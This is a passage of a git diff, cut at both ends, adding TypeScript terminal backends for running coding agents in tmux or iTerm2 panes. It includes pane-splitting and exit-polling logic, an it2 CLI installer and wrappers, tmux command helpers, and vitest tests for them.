options); + if (!this.windowTarget) { + throw new Error('External tmux window target not initialized.'); + } + + const serverName = this.getServerName(); + + if (this.panes.size === 0) { + const firstPaneId = await tmuxGetFirstPaneId( + this.windowTarget, + serverName, + ); + this.mainPaneId = firstPaneId; + debugLogger.info( + `[spawnOutsideTmux] First agent — respawn in pane ${firstPaneId}`, + ); + await tmuxRespawnPane(firstPaneId, cmd, serverName); + return firstPaneId; + } + + const panes = await tmuxListPanes(this.windowTarget, serverName); + const splitTarget = this.pickMiddlePane(panes).paneId; + const horizontal = this.shouldSplitHorizontally(panes.length); + debugLogger.info( + `[spawnOutsideTmux] Split from middle pane ${splitTarget} (${panes.length} panes, ${horizontal ? 'horizontal' : 'vertical'})`, + ); + return await tmuxSplitWindow( + splitTarget, + { horizontal, command: cmd }, + serverName, + ); + } + + private pickMiddlePane(panes: TmuxPaneInfo[]): TmuxPaneInfo { + if (panes.length === 0) { + throw new Error('No panes available to split.'); + } + return panes[Math.floor(panes.length / 2)]!; + } + + private shouldSplitHorizontally(paneCount: number): boolean { + return paneCount % 2 === 1; + } + + private async applyPaneDecorations( + paneId: string, + options: ResolvedTmuxOptions, + serverName?: string, + ): Promise { + if (!this.windowTarget) return; + + if (options.paneBorderStatus) { + await tmuxSetOption( + this.windowTarget, + 'pane-border-status', + options.paneBorderStatus, + serverName, + ); + } + + if (options.paneBorderFormat) { + await tmuxSetOption( + this.windowTarget, + 'pane-border-format', + options.paneBorderFormat, + serverName, + ); + } + + if (options.paneBorderStyle) { + await tmuxSetOption( + this.windowTarget, + 'pane-border-style', + options.paneBorderStyle, + serverName, + ); + await tmuxSelectPaneStyle(paneId, options.paneBorderStyle, serverName); + } + + if (options.paneActiveBorderStyle) { + await tmuxSetOption( + this.windowTarget, + 'pane-active-border-style', + options.paneActiveBorderStyle, + serverName, + ); + } + + await tmuxSelectPaneTitle(paneId, options.paneTitle, serverName); + } + + private async applyInsideLayout(options: ResolvedTmuxOptions): Promise { + if (!this.windowTarget || !this.mainPaneId) return; + await tmuxSelectLayout(this.windowTarget, 'main-vertical'); + await tmuxResizePane(this.mainPaneId, { + width: `${options.leaderPaneWidthPercent}%`, + }); + } + + private async applyExternalLayout(serverName?: string): Promise { + if (!this.windowTarget) return; + await tmuxSelectLayout(this.windowTarget, 'tiled', serverName); + } + + private async sleep(ms: number): Promise { + await new Promise((resolve) => setTimeout(resolve, ms)); + } + + private buildShellCommand(config: AgentSpawnConfig): string { + // Build env prefix + command + args + const envParts: string[] = []; + if (config.env) { + for (const [key, value] of Object.entries(config.env)) { + envParts.push(`${key}=${shellQuote(value)}`); + } + } + + const cmdParts = [ + shellQuote(config.command), + ...config.args.map(shellQuote), + ]; + + // cd to the working directory first + const parts = [`cd ${shellQuote(config.cwd)}`]; + if (envParts.length > 0) { + parts.push(`env ${envParts.join(' ')} ${cmdParts.join(' ')}`); + } else { + parts.push(cmdParts.join(' ')); + } + + const fullCommand = parts.join(' && '); + debugLogger.info( + `[buildShellCommand] agentId=${config.agentId}, command=${config.command}, args=${JSON.stringify(config.args)}, cwd=${config.cwd}`, + ); + debugLogger.info(`[buildShellCommand] full shell command: ${fullCommand}`); + return fullCommand; + } + + private allExited(): boolean { + if (this.pendingSpawns > 0) return false; + if (this.panes.size === 0) return true; + for (const pane of this.panes.values()) { + if (pane.status === 'running') return false; + } + return true; + } + + private startExitPolling(): void { + if (this.exitPollTimer) return; + + this.exitPollTimer = setInterval(() => { + void this.pollPaneStatus(); + }, EXIT_POLL_INTERVAL_MS); + } + + private stopExitPolling(): void { + if (this.exitPollTimer) { + clearInterval(this.exitPollTimer); + this.exitPollTimer = null; + } + } + + private async pollPaneStatus(): Promise { + let paneInfos: TmuxPaneInfo[]; + const serverName = this.getServerName(); + try { + if (!this.windowTarget) return; + // List panes in the active window + paneInfos = await tmuxListPanes(this.windowTarget, serverName); + } catch (err) { + // Window may have been killed externally + debugLogger.info( + `[pollPaneStatus] Failed to list panes for window "${this.windowTarget}": ${err}`, + ); + return; + } + + // Build a lookup: paneId → TmuxPaneInfo + const paneMap = new Map(); + for (const info of paneInfos) { + paneMap.set(info.paneId, info); + } + + // Log all pane statuses for debugging (only when there are agent panes) + if (this.panes.size > 0) { + debugLogger.info( + `[pollPaneStatus] paneCount=${paneInfos.length}, agentPanes=${JSON.stringify( + Array.from(this.panes.values()).map((p) => { + const info = paneMap.get(p.paneId); + return { + agentId: p.agentId, + paneId: p.paneId, + status: p.status, + dead: info?.dead, + deadStatus: info?.deadStatus, + }; + }), + )}`, + ); + } + + for (const agent of this.panes.values()) { + if (agent.status !== 'running') continue; + + const info = paneMap.get(agent.paneId); + if (!info) { + // Pane was killed externally — treat as exited + agent.status = 'exited'; + agent.exitCode = 1; + debugLogger.info( + `[pollPaneStatus] Agent "${agent.agentId}" pane ${agent.paneId} not found in tmux list — marking as exited`, + ); + this.onExitCallback?.(agent.agentId, 1, null); + continue; + } + + if (info.dead) { + agent.status = 'exited'; + agent.exitCode = info.deadStatus; + + debugLogger.info( + `[pollPaneStatus] Agent "${agent.agentId}" (pane ${agent.paneId}) detected as DEAD with exit code ${info.deadStatus}`, + ); + + this.onExitCallback?.(agent.agentId, info.deadStatus, null); + } + } + + // Stop polling if all agents have exited + if (this.allExited()) { + this.stopExitPolling(); + } + } +} + +/** + * Simple shell quoting for building command strings. + * Wraps value in single quotes, escaping any internal single quotes. + */ +function shellQuote(value: string): string { + return `'${value.replace(/'/g, "'\\''")}'`; +} diff --git a/packages/core/src/agents/backends/detect.ts b/packages/core/src/agents/backends/detect.ts new file mode 100644 index 000000000..f94d8c41d --- /dev/null +++ b/packages/core/src/agents/backends/detect.ts @@ -0,0 +1,88 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { createDebugLogger } from '../../utils/debugLogger.js'; +import type { Config } from '../../config/config.js'; +// import { TmuxBackend } from './TmuxBackend.js'; +import { InProcessBackend } from './InProcessBackend.js'; +import { type Backend, DISPLAY_MODE, type DisplayMode } from './types.js'; +// import { isTmuxAvailable } from './tmux-commands.js'; + +const debugLogger = createDebugLogger('BACKEND_DETECT'); + +export interface DetectBackendResult { + backend: Backend; + warning?: string; +} + +/** + * Detect and create the appropriate Backend. + * + * Detection priority: + * 1. User explicit preference (--display=in-process|tmux|iterm2) + * 2. Auto-detect: + * - inside tmux: TmuxBackend + * - other terminals: tmux external session mode when tmux is available + * - fallback to InProcessBackend + * + * @param preference - Optional display mode preference + * @param runtimeContext - Runtime config for in-process fallback + */ +export async function detectBackend( + preference: DisplayMode | undefined, + runtimeContext: Config, +): Promise { + // Currently only in-process mode is supported. Other backends (tmux, + // iterm2) are kept in the codebase but not wired up as entry points. + const warning = + preference && preference !== DISPLAY_MODE.IN_PROCESS + ? `Display mode "${preference}" is not currently supported. Using in-process mode instead.` + : undefined; + debugLogger.info('Using InProcessBackend'); + return { backend: new InProcessBackend(runtimeContext), warning }; + + // --- Disabled backends (kept for future use) --- + // // 1. User explicit preference + // if (preference === DISPLAY_MODE.IN_PROCESS) { + // debugLogger.info('Using InProcessBackend (user preference)'); + // return { backend: new InProcessBackend(runtimeContext) }; + // } + // + // if (preference === DISPLAY_MODE.ITERM2) { + // throw new Error( + // `Arena display mode "${DISPLAY_MODE.ITERM2}" is not implemented yet. Please use "${DISPLAY_MODE.TMUX}" or "${DISPLAY_MODE.IN_PROCESS}".`, + // ); + // } + // + // if (preference === DISPLAY_MODE.TMUX) { + // debugLogger.info('Using TmuxBackend (user preference)'); + // return { backend: new TmuxBackend() }; + // } + // + // // 2. Auto-detect + // if (process.env['TMUX']) { + // debugLogger.info('Detected $TMUX — attempting TmuxBackend'); + // return { backend: new TmuxBackend() }; + // } + // + // // Other terminals (including iTerm2): use tmux external session mode if available. + // if (isTmuxAvailable()) { + // debugLogger.info( + // 'tmux is available — using TmuxBackend external session mode', + // ); + // return { backend: new TmuxBackend() }; + // } + // + // // Fallback: use InProcessBackend + // debugLogger.info( + // 'No PTY backend available — falling back to InProcessBackend', + // ); + // return { + // backend: new InProcessBackend(runtimeContext), + // warning: + // 'tmux is not available. Using in-process mode (no split-pane terminal view).', + // }; +} diff --git a/packages/core/src/agents/backends/index.ts b/packages/core/src/agents/backends/index.ts new file mode 100644 index 000000000..6105fe45c --- /dev/null +++ b/packages/core/src/agents/backends/index.ts @@ -0,0 +1,19 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +export { DISPLAY_MODE } from './types.js'; +export type { + Backend, + DisplayMode, + AgentSpawnConfig, + AgentExitCallback, + TmuxBackendOptions, + InProcessSpawnConfig, +} from './types.js'; +export { TmuxBackend } from './TmuxBackend.js'; +export { ITermBackend } from './ITermBackend.js'; +export { InProcessBackend } from './InProcessBackend.js'; +export { detectBackend, type DetectBackendResult } from './detect.js'; diff --git a/packages/core/src/agents/backends/iterm-it2.test.ts b/packages/core/src/agents/backends/iterm-it2.test.ts new file mode 100644 index 000000000..723253695 --- /dev/null +++ b/packages/core/src/agents/backends/iterm-it2.test.ts @@ -0,0 +1,318 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, beforeEach, vi } from 'vitest'; + +// ─── Hoisted mocks for shell-utils ────────────────────────────── +const hoistedExecCommand = vi.hoisted(() => vi.fn()); +const hoistedIsCommandAvailable = vi.hoisted(() => vi.fn()); + +vi.mock('../../utils/shell-utils.js', () => ({ + execCommand: hoistedExecCommand, + isCommandAvailable: hoistedIsCommandAvailable, +})); + +vi.mock('../../utils/debugLogger.js', () => ({ + createDebugLogger: () => ({ + info: vi.fn(), + error: vi.fn(), + warn: vi.fn(), + }), +})); + +import { + isIt2Available, + ensureIt2Installed, + verifyITerm, + itermSplitPane, + itermRunCommand, + itermFocusSession, + itermSendText, + itermCloseSession, +} from './iterm-it2.js'; + +describe('iterm-it2', () => { + beforeEach(() => { + vi.clearAllMocks(); + }); + + // ─── isIt2Available ───────────────────────────────────────── + + describe('isIt2Available', () => { + it('returns true when it2 is on PATH', () => { + hoistedIsCommandAvailable.mockReturnValue({ available: true }); + expect(isIt2Available()).toBe(true); + expect(hoistedIsCommandAvailable).toHaveBeenCalledWith('it2'); + }); + + it('returns false when it2 is not on PATH', () => { + hoistedIsCommandAvailable.mockReturnValue({ available: false }); + expect(isIt2Available()).toBe(false); + }); + }); + + // ─── ensureIt2Installed ────────────────────────────────────── + + describe('ensureIt2Installed', () => { + it('does nothing if it2 is already available', async () => { + hoistedIsCommandAvailable.mockReturnValue({ available: true }); + await ensureIt2Installed(); + expect(hoistedExecCommand).not.toHaveBeenCalled(); + }); + + it('installs via uv when uv is available', async () => { + // isIt2Available() → false; uv available; install succeeds; recheck → true + hoistedIsCommandAvailable + .mockReturnValueOnce({ available: false }) // isIt2Available() initial + .mockReturnValueOnce({ available: true }); // uv available + hoistedExecCommand.mockResolvedValue({ + code: 0, + stdout: '', + stderr: '', + }); + // After install, it2 is available + hoistedIsCommandAvailable.mockReturnValueOnce({ available: true }); + + await ensureIt2Installed(); + + expect(hoistedExecCommand).toHaveBeenCalledWith( + 'uv', + ['tool', 'install', 'it2'], + expect.any(Object), + ); + }); + + it('falls back to pipx when uv is unavailable', async () => { + hoistedIsCommandAvailable + .mockReturnValueOnce({ available: false }) // isIt2Available() + .mockReturnValueOnce({ available: false }) // uv not available + .mockReturnValueOnce({ available: true }); // pipx available + hoistedExecCommand.mockResolvedValue({ + code: 0, + stdout: '', + stderr: '', + }); + hoistedIsCommandAvailable.mockReturnValueOnce({ available: true }); // recheck + + await ensureIt2Installed(); + + expect(hoistedExecCommand).toHaveBeenCalledWith( + 'pipx', + ['install', 'it2'], + expect.any(Object), + ); + }); + + it('falls back to pip when uv and pipx are unavailable', async () => { + hoistedIsCommandAvailable + .mockReturnValueOnce({ available: false }) // isIt2Available() + .mockReturnValueOnce({ available: false }) // uv + .mockReturnValueOnce({ available: false }) // pipx + .mockReturnValueOnce({ available: true }); // pip available + hoistedExecCommand.mockResolvedValue({ + code: 0, + stdout: '', + stderr: '', + }); + hoistedIsCommandAvailable.mockReturnValueOnce({ available: true }); // recheck + + await ensureIt2Installed(); + + expect(hoistedExecCommand).toHaveBeenCalledWith( + 'pip', + ['install', '--user', 'it2'], + expect.any(Object), + ); + }); + + it('throws if no installer succeeds', async () => { + hoistedIsCommandAvailable.mockReturnValue({ available: false }); + + await expect(ensureIt2Installed()).rejects.toThrow( + 'it2 is not installed', + ); + }); + }); + + // ─── verifyITerm ────────────────────────────────────────────── + + describe('verifyITerm', () => { + it('succeeds when session list returns code 0', async () => { + hoistedIsCommandAvailable.mockReturnValue({ available: true }); + hoistedExecCommand.mockResolvedValue({ + code: 0, + stdout: 'session1\n', + stderr: '', + }); + + await expect(verifyITerm()).resolves.toBeUndefined(); + }); + + it('throws Python API error when stderr mentions "api"', async () => { + hoistedIsCommandAvailable.mockReturnValue({ available: true }); + hoistedExecCommand.mockResolvedValue({ + code: 1, + stdout: '', + stderr: 'Python API not enabled', + }); + + await expect(verifyITerm()).rejects.toThrow('Python API not enabled'); + }); + + it('throws Python API error when stderr mentions "connection refused"', async () => { + hoistedIsCommandAvailable.mockReturnValue({ available: true }); + hoistedExecCommand.mockResolvedValue({ + code: 1, + stdout: '', + stderr: 'Connection refused to iTerm2', + }); + + await expect(verifyITerm()).rejects.toThrow('Python API not enabled'); + }); + + it('throws generic error for unrecognized failures', async () => { + hoistedIsCommandAvailable.mockReturnValue({ available: true }); + hoistedExecCommand.mockResolvedValue({ + code: 1, + stdout: '', + stderr: 'some unknown error', + }); + + await expect(verifyITerm()).rejects.toThrow('it2 session list failed'); + }); + }); + + // ─── itermSplitPane ────────────────────────────────────────── + + describe('itermSplitPane', () => { + it('splits vertically without session ID', async () => { + hoistedExecCommand.mockResolvedValue({ + code: 0, + stdout: 'Created new pane: w0t1p2\n', + stderr: '', + }); + + const paneId = await itermSplitPane(); + expect(paneId).toBe('w0t1p2'); + expect(hoistedExecCommand).toHaveBeenCalledWith( + 'it2', + ['session', 'split', '-v'], + expect.any(Object), + ); + }); + + it('passes -s flag when session ID is provided', async () => { + hoistedExecCommand.mockResolvedValue({ + code: 0, + stdout: 'Created new pane: w0t1p3\n', + stderr: '', + }); + + await itermSplitPane('sess-123'); + expect(hoistedExecCommand).toHaveBeenCalledWith( + 'it2', + ['session', 'split', '-v', '-s', 'sess-123'], + expect.any(Object), + ); + }); + + it('throws if pane ID cannot be parsed from output', async () => { + hoistedExecCommand.mockResolvedValue({ + code: 0, + stdout: 'Unexpected output\n', + stderr: '', + }); + + await expect(itermSplitPane()).rejects.toThrow('Unable to parse'); + }); + + it('throws on non-zero exit code', async () => { + hoistedExecCommand.mockResolvedValue({ + code: 1, + stdout: '', + stderr: 'split failed', + }); + + await expect(itermSplitPane()).rejects.toThrow('split failed'); + }); + }); + + // ─── itermRunCommand ────────────────────────────────────────── + + describe('itermRunCommand', () => { + it('calls it2 session run with correct args', async () => { + hoistedExecCommand.mockResolvedValue({ + code: 0, + stdout: '', + stderr: '', + }); + + await itermRunCommand('sess-1', 'ls -la'); + expect(hoistedExecCommand).toHaveBeenCalledWith( + 'it2', + ['session', 'run', '-s', 'sess-1', 'ls -la'], + expect.any(Object), + ); + }); + }); + + // ─── itermFocusSession ──────────────────────────────────────── + + describe('itermFocusSession', () => { + it('calls it2 session focus with correct args', async () => { + hoistedExecCommand.mockResolvedValue({ + code: 0, + stdout: '', + stderr: '', + }); + + await itermFocusSession('sess-1'); + expect(hoistedExecCommand).toHaveBeenCalledWith( + 'it2', + ['session', 'focus', 'sess-1'], + expect.any(Object), + ); + }); + }); + + // ─── itermSendText ───────────────────────────────────────────── + + describe('itermSendText', () => { + it('calls it2 session send with correct args', async () => { + hoistedExecCommand.mockResolvedValue({ + code: 0, + stdout: '', + stderr: '', + }); + + await itermSendText('sess-1', 'hello world'); + expect(hoistedExecCommand).toHaveBeenCalledWith( + 'it2', + ['session', 'send', '-s', 'sess-1', 'hello world'], + expect.any(Object), + ); + }); + }); + + // ─── itermCloseSession ──────────────────────────────────────── + + describe('itermCloseSession', () => { + it('calls it2 session close with correct args', async () => { + hoistedExecCommand.mockResolvedValue({ + code: 0, + stdout: '', + stderr: '', + }); + + await itermCloseSession('sess-1'); + expect(hoistedExecCommand).toHaveBeenCalledWith( + 'it2', + ['session', 'close', '-s', 'sess-1'], + expect.any(Object), + ); + }); + }); +}); diff --git a/packages/core/src/agents/backends/iterm-it2.ts b/packages/core/src/agents/backends/iterm-it2.ts new file mode 100644 index 000000000..cf550b912 --- /dev/null +++ b/packages/core/src/agents/backends/iterm-it2.ts @@ -0,0 +1,141 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Type-safe async wrappers for iTerm2 it2 CLI commands. + * + * The it2 CLI talks to iTerm2's Python API. We use it2 directly and avoid + * AppleScript to match the Team design spec. + */ + +import { execCommand, isCommandAvailable } from '../../utils/shell-utils.js'; +import { createDebugLogger } from '../../utils/debugLogger.js'; + +const debugLogger = createDebugLogger('ITERM_IT2'); + +// ─── Helpers ──────────────────────────────────────────────────── + +async function it2Result( + args: string[], +): Promise<{ stdout: string; stderr: string; code: number }> { + debugLogger.info(`it2 ${args.join(' ')}`); + const result = await execCommand('it2', args, { + preserveOutputOnError: true, + }); + if (result.code !== 0 && result.stderr.trim()) { + debugLogger.error(`it2 error: ${result.stderr.trim()}`); + } + return result; +} + +async function it2(args: string[]): Promise { + const result = await it2Result(args); + if (result.code !== 0) { + const message = result.stderr.trim() || result.stdout.trim(); + throw new Error(message || 'it2 command failed'); + } + return result.stdout; +} + +function parseCreatedPaneId(output: string): string { + const match = output.match(/Created new pane:\s*(\S+)/); + if (!match?.[1]) { + throw new Error(`Unable to parse it2 split output: ${output.trim()}`); + } + return match[1]; +} + +// ─── Installation & Verification ─────────────────────────────── + +export function isIt2Available(): boolean { + return isCommandAvailable('it2').available; +} + +async function tryInstallIt2( + command: string, + args: string[], +): Promise { + if (!isCommandAvailable(command).available) return false; + const result = await execCommand(command, args, { + preserveOutputOnError: true, + }); + return result.code === 0; +} + +export async function ensureIt2Installed(): Promise { + if (isIt2Available()) return; + + const installers: Array<{ cmd: string; args: string[] }> = [ + { cmd: 'uv', args: ['tool', 'install', 'it2'] }, + { cmd: 'pipx', args: ['install', 'it2'] }, + { cmd: 'pip', args: ['install', '--user', 'it2'] }, + ]; + + for (const installer of installers) { + const installed = await tryInstallIt2(installer.cmd, installer.args); + if (installed && isIt2Available()) return; + } + + throw new Error( + 'it2 is not installed. Install it2 via "uv tool install it2", "pipx install it2", or "pip install --user it2".', + ); +} + +export async function verifyITerm(): Promise { + await ensureIt2Installed(); + + const result = await it2Result(['session', 'list']); + if (result.code === 0) return; + + const combined = `${result.stdout}\n${result.stderr}`.toLowerCase(); + if ( + combined.includes('api') || + combined.includes('python') || + combined.includes('connection refused') || + combined.includes('not enabled') + ) { + throw new Error( + 'iTerm2 Python API not enabled. Enable it in iTerm2 → Settings → General → Magic → Enable Python API, then restart iTerm2.', + ); + } + + throw new Error( + `it2 session list failed: ${result.stderr.trim() || result.stdout.trim()}`, + ); +} + +// ─── Public API ───────────────────────────────────────────────── + +export async function itermSplitPane(sessionId?: string): Promise { + const args = ['session', 'split', '-v']; + if (sessionId) { + args.push('-s', sessionId); + } + const output = await it2(args); + return parseCreatedPaneId(output); +} + +export async function itermRunCommand( + sessionId: string, + command: string, +): Promise { + await it2(['session', 'run', '-s', sessionId, command]); +} + +export async function itermFocusSession(sessionId: string): Promise { + await it2(['session', 'focus', sessionId]); +} + +export async function itermSendText( + sessionId: string, + text: string, +): Promise { + await it2(['session', 'send', '-s', sessionId, text]); +} + +export async function itermCloseSession(sessionId: string): Promise { + await it2(['session', 'close', '-s', sessionId]); +} diff --git a/packages/core/src/agents/backends/tmux-commands.test.ts b/packages/core/src/agents/backends/tmux-commands.test.ts new file mode 100644 index 000000000..8e4a790ba --- /dev/null +++ b/packages/core/src/agents/backends/tmux-commands.test.ts @@ -0,0 +1,60 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect } from 'vitest'; +import { parseTmuxListPanes } from './tmux-commands.js'; + +describe('parseTmuxListPanes', () => { + it('parses a single running pane', () => { + const output = '%0 0 0\n'; + const result = parseTmuxListPanes(output); + expect(result).toEqual([{ paneId: '%0', dead: false, deadStatus: 0 }]); + }); + + it('parses a single dead pane with exit code', () => { + const output = '%1 1 42\n'; + const result = parseTmuxListPanes(output); + expect(result).toEqual([{ paneId: '%1', dead: true, deadStatus: 42 }]); + }); + + it('parses multiple panes with mixed statuses', () => { + const output = '%0 0 0\n%1 1 1\n%2 0 0\n%3 1 137\n'; + const result = parseTmuxListPanes(output); + expect(result).toEqual([ + { paneId: '%0', dead: false, deadStatus: 0 }, + { paneId: '%1', dead: true, deadStatus: 1 }, + { paneId: '%2', dead: false, deadStatus: 0 }, + { paneId: '%3', dead: true, deadStatus: 137 }, + ]); + }); + + it('returns empty array for empty output', () => { + expect(parseTmuxListPanes('')).toEqual([]); + }); + + it('returns empty array for whitespace-only output', () => { + expect(parseTmuxListPanes(' \n \n')).toEqual([]); + }); + + it('skips lines with insufficient fields', () => { + const output = '%0\n%1 1 0\n'; + const result = parseTmuxListPanes(output); + expect(result).toEqual([{ paneId: '%1', dead: true, deadStatus: 0 }]); + }); + + it('defaults deadStatus to 0 when missing', () => { + // tmux might omit the third field when pane is alive + const output = '%0 0\n'; + const result = parseTmuxListPanes(output); + expect(result).toEqual([{ paneId: '%0', dead: false, deadStatus: 0 }]); + }); + + it('handles extra whitespace gracefully', () => { + const output = ' %5 1 99 \n'; + const result = parseTmuxListPanes(output); + expect(result).toEqual([{ paneId: '%5', dead: true, deadStatus: 99 }]); + }); +}); diff --git a/packages/core/src/agents/backends/tmux-commands.ts b/packages/core/src/agents/backends/tmux-commands.ts new file mode 100644 index 000000000..6400a72da --- /dev/null +++ b/packages/core/src/agents/backends/tmux-commands.ts @@ -0,0 +1,503 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Type-safe async wrappers for tmux CLI commands. + * + * All functions use `execCommand('tmux', [...args])` from shell-utils, + * avoiding shell injection by passing arguments as arrays (execFile). + */ + +import { execCommand, isCommandAvailable } from '../../utils/shell-utils.js'; +import { createDebugLogger } from '../../utils/debugLogger.js'; + +const debugLogger = createDebugLogger('TMUX_CMD'); + +/** + * Information about a tmux pane, parsed from `list-panes`. + */ +export interface TmuxPaneInfo { + /** Pane ID (e.g., '%0', '%1') */ + paneId: string; + /** Whether the pane's process has exited */ + dead: boolean; + /** Exit status of the pane's process (only valid when dead=true) */ + deadStatus: number; +} + +/** + * Information about a tmux window. + */ +export interface TmuxWindowInfo { + /** Window name */ + name: string; + /** Window ID (e.g., '@1') */ + id: string; +} + +/** + * Minimum tmux version required for split-pane support. + */ +const MIN_TMUX_VERSION = '3.0'; + +// ─── Helpers ──────────────────────────────────────────────────── + +async function tmuxResult( + args: string[], + serverName?: string, +): Promise<{ stdout: string; stderr: string; code: number }> { + const fullArgs = serverName ? ['-L', serverName, ...args] : args; + debugLogger.info(`tmux ${fullArgs.join(' ')}`); + const result = await execCommand('tmux', fullArgs, { + preserveOutputOnError: true, + }); + if (result.code !== 0 && result.stderr.trim()) { + debugLogger.error(`tmux error: ${result.stderr.trim()}`); + } + return result; +} + +async function tmux(args: string[], serverName?: string): Promise { + const result = await tmuxResult(args, serverName); + if (result.code !== 0) { + throw new Error( + `tmux ${args[0]} failed (exit ${result.code}): ${result.stderr.trim() || result.stdout.trim()}`, + ); + } + return result.stdout; +} + +function parseVersion(versionStr: string): number[] { + // "tmux 3.4" → [3, 4] + const match = versionStr.match(/(\d+)\.(\d+)/); + if (!match) return [0, 0]; + return [parseInt(match[1]!, 10), parseInt(match[2]!, 10)]; +} + +function isVersionAtLeast(current: string, minimum: string): boolean { + const [curMajor = 0, curMinor = 0] = parseVersion(current); + const [minMajor = 0, minMinor = 0] = parseVersion(minimum); + if (curMajor !== minMajor) return curMajor > minMajor; + return curMinor >= minMinor; +} + +// ─── Public API ───────────────────────────────────────────────── + +/** + * Check if tmux is available on the system. + */ +export function isTmuxAvailable(): boolean { + return isCommandAvailable('tmux').available; +} + +/** + * Get tmux version string (e.g., "tmux 3.4"). + */ +export async function tmuxVersion(): Promise { + const output = await tmux(['-V']); + return output.trim(); +} + +/** + * Verify tmux is available and meets minimum version requirement. + * + * @throws Error if tmux is not available or version is too old. + */ +export async function verifyTmux(): Promise { + if (!isTmuxAvailable()) { + throw new Error( + 'tmux is not installed. Install tmux (version 3.0+) for split-pane mode.', + ); + } + + const version = await tmuxVersion(); + if (!isVersionAtLeast(version, MIN_TMUX_VERSION)) { + throw new Error( + `tmux version ${MIN_TMUX_VERSION}+ required for split-pane mode (found: ${version}).`, + ); + } +} + +/** + * Get the current tmux session name (when running inside tmux). + */ +export async function tmuxCurrentSession(): Promise { + const output = await tmux(['display-message', '-p', '#{session_name}']); + return output.trim(); +} + +/** + * Get the current tmux pane ID (when running inside tmux). + */ +export async function tmuxCurrentPaneId(): Promise { + const output = await tmux(['display-message', '-p', '#{pane_id}']); + return output.trim(); +} + +/** + * Get the current tmux window target (session:window_index). + */ +export async function tmuxCurrentWindowTarget(): Promise { + const output = await tmux([ + 'display-message', + '-p', + '#{session_name}:#{window_index}', + ]); + return output.trim(); +} + +/** + * Check if a tmux session exists. + */ +export async function tmuxHasSession( + name: string, + serverName?: string, +): Promise { + const result = await tmuxResult(['has-session', '-t', name], serverName); + return result.code === 0; +} + +/** + * List windows in a session. + */ +export async function tmuxListWindows( + sessionName: string, + serverName?: string, +): Promise { + const output = await tmux( + ['list-windows', '-t', sessionName, '-F', '#{window_name} #{window_id}'], + serverName, + ); + const windows: TmuxWindowInfo[] = []; + for (const line of output.trim().split('\n')) { + if (!line.trim()) continue; + const [name, id] = line.trim().split(/\s+/, 2); + if (!name || !id) continue; + windows.push({ name, id }); + } + return windows; +} + +/** + * Check if a tmux window exists within a session. + */ +export async function tmuxHasWindow( + sessionName: string, + windowName: string, + serverName?: string, +): Promise { + const windows = await tmuxListWindows(sessionName, serverName); + return windows.some((w) => w.name === windowName); +} + +/** + * Create a new detached tmux session. + */ +export async function tmuxNewSession( + name: string, + opts?: { cols?: number; rows?: number; windowName?: string }, + serverName?: string, +): Promise { + const args = ['new-session', '-d', '-s', name]; + if (opts?.windowName) args.push('-n', opts.windowName); + if (opts?.cols) args.push('-x', String(opts.cols)); + if (opts?.rows) args.push('-y', String(opts.rows)); + await tmux(args, serverName); +} + +/** + * Create a new window in an existing session. + */ +export async function tmuxNewWindow( + targetSession: string, + windowName: string, + serverName?: string, +): Promise { + // -t session: (with trailing colon) means "create window in this session" + // -t session (without colon) means "create at window index = session", which fails if index exists + await tmux( + ['new-window', '-t', `${targetSession}:`, '-n', windowName], + serverName, + ); +} + +/** + * Split a window/pane and return the new pane ID. + * + * @param target - Target pane/window (e.g., session:window or pane ID) + * @param opts.horizontal - Split horizontally (left/right) if true, vertically (top/bottom) if false + * @param opts.percent - Size of the new pane as a percentage (e.g., 70 for 70%) + * @param opts.command - Shell command to execute directly in the new pane. + * When provided, the command becomes the pane's process (not a shell), + * so `#{pane_dead}` is set when the command exits. + * @returns The pane ID of the newly created pane (e.g., '%5') + */ +export async function tmuxSplitWindow( + target: string, + opts?: { horizontal?: boolean; percent?: number; command?: string }, + serverName?: string, +): Promise { + const args = ['split-window', '-t', target]; + if (opts?.horizontal) { + args.push('-h'); + } + if (opts?.percent !== undefined) { + args.push('-l', `${opts.percent}%`); + } + // -P -F: print new pane info in the specified format + args.push('-P', '-F', '#{pane_id}'); + if (opts?.command) { + args.push(opts.command); + } + const output = await tmux(args, serverName); + return output.trim(); +} + +/** + * Send keys to a tmux pane. + * + * @param paneId - Target pane ID + * @param keys - Keys to send + * @param opts.literal - If true, use -l flag (send keys literally, don't interpret) + */ +export async function tmuxSendKeys( + paneId: string, + keys: string, + opts?: { literal?: boolean; enter?: boolean }, + serverName?: string, +): Promise { + const args = ['send-keys', '-t', paneId]; + if (opts?.literal) { + args.push('-l'); + } + args.push(keys); + if (opts?.enter) { + args.push('Enter'); + } + await tmux(args, serverName); +} + +/** + * Select (focus) a tmux pane. + */ +export async function tmuxSelectPane( + paneId: string, + serverName?: string, +): Promise { + await tmux(['select-pane', '-t', paneId], serverName); +} + +/** + * Set a pane title. + */ +export async function tmuxSelectPaneTitle( + paneId: string, + title: string, + serverName?: string, +): Promise { + await tmux(['select-pane', '-t', paneId, '-T', title], serverName); +} + +/** + * Set a pane border style via select-pane -P. + */ +export async function tmuxSelectPaneStyle( + paneId: string, + style: string, + serverName?: string, +): Promise { + await tmux(['select-pane', '-t', paneId, '-P', style], serverName); +} + +/** + * Set the layout for a target window. + * + * @param target - Target window (e.g., session:window) + * @param layout - Layout name: 'tiled', 'even-horizontal', 'even-vertical', etc. + */ +export async function tmuxSelectLayout( + target: string, + layout: string, + serverName?: string, +): Promise { + await tmux(['select-layout', '-t', target, layout], serverName); +} + +/** + * Capture the content of a pane (including ANSI escape codes). + * + * @returns The captured pane content as a string. + */ +export async function tmuxCapturePaneContent( + paneId: string, + serverName?: string, +): Promise { + // -p: output to stdout, -e: include escape sequences + return await tmux(['capture-pane', '-t', paneId, '-p', '-e'], serverName); +} + +/** + * List panes in a target window/session and return parsed info. + * + * @param target - Target window (e.g., session:window) + * @returns Array of pane information. + */ +export async function tmuxListPanes( + target: string, + serverName?: 